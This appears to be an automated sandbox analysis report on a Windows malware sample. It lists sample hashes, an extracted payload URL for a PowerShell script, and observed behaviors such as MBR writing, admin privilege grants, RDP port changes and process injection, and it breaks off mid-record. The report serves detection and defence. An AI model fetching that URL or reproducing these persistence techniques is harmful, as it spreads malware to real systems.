Overview
overview
10Static
static
100f56c5738a...f08901
linux_amd64
0f56c5738a...f08901
linux_mipsel
0f56c5738a...f08901
linux_mips
219156c025...f0.exe
windows7_x64
10219156c025...f0.exe
windows10_x64
102a0f53dd66...03.exe
windows7_x64
102a0f53dd66...03.exe
windows10_x64
1036ef5e0db1...a0.exe
windows7_x64
1036ef5e0db1...a0.exe
windows10_x64
104072fc745a...65.exe
windows7_x64
104072fc745a...65.exe
windows10_x64
1042c8ded976...95.exe
windows7_x64
1042c8ded976...95.exe
windows10_x64
1052969fae09...5d.rtf
windows7_x64
1052969fae09...5d.rtf
windows10_x64
10571de4698e...31.exe
windows7_x64
10571de4698e...31.exe
windows10_x64
1057bb59a2c4...52.rtf
windows7_x64
1057bb59a2c4...52.rtf
windows10_x64
10662fbe23c8...0a.exe
windows7_x64
10662fbe23c8...0a.exe
windows10_x64
1070d5a71e82...91.dll
windows7_x64
170d5a71e82...91.dll
windows10_x64
171d384c258...86.exe
windows7_x64
1071d384c258...86.exe
windows10_x64
1079745c2263...9d.exe
windows7_x64
1079745c2263...9d.exe
windows10_x64
1083c46c1972...c3.exe
windows7_x64
1083c46c1972...c3.exe
windows10_x64
108cecb6b01a...d0.exe
windows7_x64
108cecb6b01a...d0.exe
windows10_x64
10a3feb5265e...66.exe
windows7_x64
10Analysis
-
max time kernel
128s -
max time network
117s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
30-07-2021 15:26
Behavioral task
behavioral1
Sample
0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
Resource
ubuntu-amd64
Behavioral task
behavioral2
Sample
0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
Resource
debian9-mipsel
Behavioral task
behavioral3
Sample
0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
Resource
debian9-mipsbe
Behavioral task
behavioral4
Sample
219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe
Resource
win7v20210408
Behavioral task
behavioral5
Sample
219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
Resource
win7v20210410
Behavioral task
behavioral7
Sample
2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
Resource
win7v20210408
Behavioral task
behavioral9
Sample
36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
Resource
win7v20210408
Behavioral task
behavioral11
Sample
4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
Resource
win10v20210410
Behavioral task
behavioral12
Sample
42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe
Resource
win7v20210408
Behavioral task
behavioral13
Sample
42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe
Resource
win10v20210410
Behavioral task
behavioral14
Sample
52969fae09c2428c701a8b51a20c1eb07bab1bca79acb21eaa910d764533155d.rtf
Resource
win7v20210408
Behavioral task
behavioral15
Sample
52969fae09c2428c701a8b51a20c1eb07bab1bca79acb21eaa910d764533155d.rtf
Resource
win10v20210410
Behavioral task
behavioral16
Sample
571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe
Resource
win7v20210410
Behavioral task
behavioral17
Sample
571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe
Resource
win10v20210408
Behavioral task
behavioral18
Sample
57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf
Resource
win7v20210410
Behavioral task
behavioral19
Sample
57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf
Resource
win10v20210408
Behavioral task
behavioral20
Sample
662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
Resource
win7v20210410
Behavioral task
behavioral21
Sample
662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
70d5a71e821c8024fa2d5fb8a389390acc1289b88745fad61b6536cab0bd5191.dll
Resource
win7v20210410
Behavioral task
behavioral23
Sample
70d5a71e821c8024fa2d5fb8a389390acc1289b88745fad61b6536cab0bd5191.dll
Resource
win10v20210408
Behavioral task
behavioral24
Sample
71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
Resource
win7v20210408
Behavioral task
behavioral25
Sample
71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
Resource
win10v20210410
Behavioral task
behavioral26
Sample
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
Resource
win7v20210410
Behavioral task
behavioral27
Sample
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
Resource
win10v20210410
Behavioral task
behavioral28
Sample
83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
Resource
win7v20210408
Behavioral task
behavioral29
Sample
83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
Resource
win10v20210410
Behavioral task
behavioral30
Sample
8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
Resource
win7v20210410
Behavioral task
behavioral31
Sample
8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
Resource
win10v20210408
Behavioral task
behavioral32
Sample
a3feb5265e6d02710f04ff618e966e9da9ba8fc8dc5692d6f7633fe0a3037b66.exe
Resource
win7v20210410
General
-
Target
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
-
Size
9.2MB
-
MD5
5e12e56a643c71b913ea60f48f28726d
-
SHA1
8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
-
SHA256
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
-
SHA512
807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 17 4956 powershell.exe 19 4956 powershell.exe 20 4956 powershell.exe 21 4956 powershell.exe 23 4956 powershell.exe 25 4956 powershell.exe 27 4956 powershell.exe 29 4956 powershell.exe 31 4956 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
ViJoy.exeexe2.exeexe1.exeNFWCHK.exepid process 3160 ViJoy.exe 988 exe2.exe 3420 exe1.exe 2100 NFWCHK.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1752 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 4148 4148 -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
exe2.exedescription ioc process File opened for modification \??\PhysicalDrive0 exe2.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ioi34byk.iwq.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85D2.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vaeiksoi.ivg.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8591.tmp powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85B1.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85C2.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85D3.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe -
Modifies registry class 1 IoCs
Processes:
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 2392 powershell.exe 2392 powershell.exe 2392 powershell.exe 4140 powershell.exe 4140 powershell.exe 4140 powershell.exe 4416 powershell.exe 4416 powershell.exe 4416 powershell.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1752 powershell.exe Token: SeDebugPrivilege 2392 powershell.exe Token: SeIncreaseQuotaPrivilege 2392 powershell.exe Token: SeSecurityPrivilege 2392 powershell.exe Token: SeTakeOwnershipPrivilege 2392 powershell.exe Token: SeLoadDriverPrivilege 2392 powershell.exe Token: SeSystemProfilePrivilege 2392 powershell.exe Token: SeSystemtimePrivilege 2392 powershell.exe Token: SeProfSingleProcessPrivilege 2392 powershell.exe Token: SeIncBasePriorityPrivilege 2392 powershell.exe Token: SeCreatePagefilePrivilege 2392 powershell.exe Token: SeBackupPrivilege 2392 powershell.exe Token: SeRestorePrivilege 2392 powershell.exe Token: SeShutdownPrivilege 2392 powershell.exe Token: SeDebugPrivilege 2392 powershell.exe Token: SeSystemEnvironmentPrivilege 2392 powershell.exe Token: SeRemoteShutdownPrivilege 2392 powershell.exe Token: SeUndockPrivilege 2392 powershell.exe Token: SeManageVolumePrivilege 2392 powershell.exe Token: 33 2392 powershell.exe Token: 34 2392 powershell.exe Token: 35 2392 powershell.exe Token: 36 2392 powershell.exe Token: SeDebugPrivilege 4140 powershell.exe Token: SeIncreaseQuotaPrivilege 4140 powershell.exe Token: SeSecurityPrivilege 4140 powershell.exe Token: SeTakeOwnershipPrivilege 4140 powershell.exe Token: SeLoadDriverPrivilege 4140 powershell.exe Token: SeSystemProfilePrivilege 4140 powershell.exe Token: SeSystemtimePrivilege 4140 powershell.exe Token: SeProfSingleProcessPrivilege 4140 powershell.exe Token: SeIncBasePriorityPrivilege 4140 powershell.exe Token: SeCreatePagefilePrivilege 4140 powershell.exe Token: SeBackupPrivilege 4140 powershell.exe Token: SeRestorePrivilege 4140 powershell.exe Token: SeShutdownPrivilege 4140 powershell.exe Token: SeDebugPrivilege 4140 powershell.exe Token: SeSystemEnvironmentPrivilege 4140 powershell.exe Token: SeRemoteShutdownPrivilege 4140 powershell.exe Token: SeUndockPrivilege 4140 powershell.exe Token: SeManageVolumePrivilege 4140 powershell.exe Token: 33 4140 powershell.exe Token: 34 4140 powershell.exe Token: 35 4140 powershell.exe Token: 36 4140 powershell.exe Token: SeDebugPrivilege 4416 powershell.exe Token: SeIncreaseQuotaPrivilege 4416 powershell.exe Token: SeSecurityPrivilege 4416 powershell.exe Token: SeTakeOwnershipPrivilege 4416 powershell.exe Token: SeLoadDriverPrivilege 4416 powershell.exe Token: SeSystemProfilePrivilege 4416 powershell.exe Token: SeSystemtimePrivilege 4416 powershell.exe Token: SeProfSingleProcessPrivilege 4416 powershell.exe Token: SeIncBasePriorityPrivilege 4416 powershell.exe Token: SeCreatePagefilePrivilege 4416 powershell.exe Token: SeBackupPrivilege 4416 powershell.exe Token: SeRestorePrivilege 4416 powershell.exe Token: SeShutdownPrivilege 4416 powershell.exe Token: SeDebugPrivilege 4416 powershell.exe Token: SeSystemEnvironmentPrivilege 4416 powershell.exe Token: SeRemoteShutdownPrivilege 4416 powershell.exe Token: SeUndockPrivilege 4416 powershell.exe Token: SeManageVolumePrivilege 4416 powershell.exe Token: 33 4416 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
exe2.exepid process 988 exe2.exe 988 exe2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exeViJoy.exeexe1.exeexe2.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 1868 wrote to memory of 3160 1868 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe ViJoy.exe PID 1868 wrote to memory of 3160 1868 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe ViJoy.exe PID 1868 wrote to memory of 3160 1868 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe ViJoy.exe PID 3160 wrote to memory of 3420 3160 ViJoy.exe exe1.exe PID 3160 wrote to memory of 3420 3160 ViJoy.exe exe1.exe PID 3160 wrote to memory of 988 3160 ViJoy.exe exe2.exe PID 3160 wrote to memory of 988 3160 ViJoy.exe exe2.exe PID 3160 wrote to memory of 988 3160 ViJoy.exe exe2.exe PID 3420 wrote to memory of 1752 3420 exe1.exe powershell.exe PID 3420 wrote to memory of 1752 3420 exe1.exe powershell.exe PID 988 wrote to memory of 2100 988 exe2.exe NFWCHK.exe PID 988 wrote to memory of 2100 988 exe2.exe NFWCHK.exe PID 1752 wrote to memory of 4016 1752 powershell.exe csc.exe PID 1752 wrote to memory of 4016 1752 powershell.exe csc.exe PID 4016 wrote to memory of 1036 4016 csc.exe cvtres.exe PID 4016 wrote to memory of 1036 4016 csc.exe cvtres.exe PID 1752 wrote to memory of 2392 1752 powershell.exe powershell.exe PID 1752 wrote to memory of 2392 1752 powershell.exe powershell.exe PID 1752 wrote to memory of 4140 1752 powershell.exe powershell.exe PID 1752 wrote to memory of 4140 1752 powershell.exe powershell.exe PID 1752 wrote to memory of 4416 1752 powershell.exe powershell.exe PID 1752 wrote to memory of 4416 1752 powershell.exe powershell.exe PID 1752 wrote to memory of 4832 1752 powershell.exe reg.exe PID 1752 wrote to memory of 4832 1752 powershell.exe reg.exe PID 1752 wrote to memory of 4852 1752 powershell.exe reg.exe PID 1752 wrote to memory of 4852 1752 powershell.exe reg.exe PID 1752 wrote to memory of 4872 1752 powershell.exe reg.exe PID 1752 wrote to memory of 4872 1752 powershell.exe reg.exe PID 1752 wrote to memory of 5052 1752 powershell.exe net.exe PID 1752 wrote to memory of 5052 1752 powershell.exe net.exe PID 5052 wrote to memory of 5072 5052 net.exe net1.exe PID 5052 wrote to memory of 5072 5052 net.exe net1.exe PID 1752 wrote to memory of 5104 1752 powershell.exe cmd.exe PID 1752 wrote to memory of 5104 1752 powershell.exe cmd.exe PID 5104 wrote to memory of 4100 5104 cmd.exe cmd.exe PID 5104 wrote to memory of 4100 5104 cmd.exe cmd.exe PID 4100 wrote to memory of 680 4100 cmd.exe net.exe PID 4100 wrote to memory of 680 4100 cmd.exe net.exe PID 680 wrote to memory of 4016 680 net.exe net1.exe PID 680 wrote to memory of 4016 680 net.exe net1.exe PID 1752 wrote to memory of 2784 1752 powershell.exe cmd.exe PID 1752 wrote to memory of 2784 1752 powershell.exe cmd.exe PID 2784 wrote to memory of 4112 2784 cmd.exe cmd.exe PID 2784 wrote to memory of 4112 2784 cmd.exe cmd.exe PID 4112 wrote to memory of 4120 4112 cmd.exe net.exe PID 4112 wrote to memory of 4120 4112 cmd.exe net.exe PID 4120 wrote to memory of 3204 4120 net.exe net1.exe PID 4120 wrote to memory of 3204 4120 net.exe net1.exe PID 4268 wrote to memory of 4312 4268 cmd.exe net.exe PID 4268 wrote to memory of 4312 4268 cmd.exe net.exe PID 4312 wrote to memory of 4332 4312 net.exe net1.exe PID 4312 wrote to memory of 4332 4312 net.exe net1.exe PID 4352 wrote to memory of 4220 4352 cmd.exe net.exe PID 4352 wrote to memory of 4220 4352 cmd.exe net.exe PID 4220 wrote to memory of 4192 4220 net.exe net1.exe PID 4220 wrote to memory of 4192 4220 net.exe net1.exe PID 4244 wrote to memory of 4168 4244 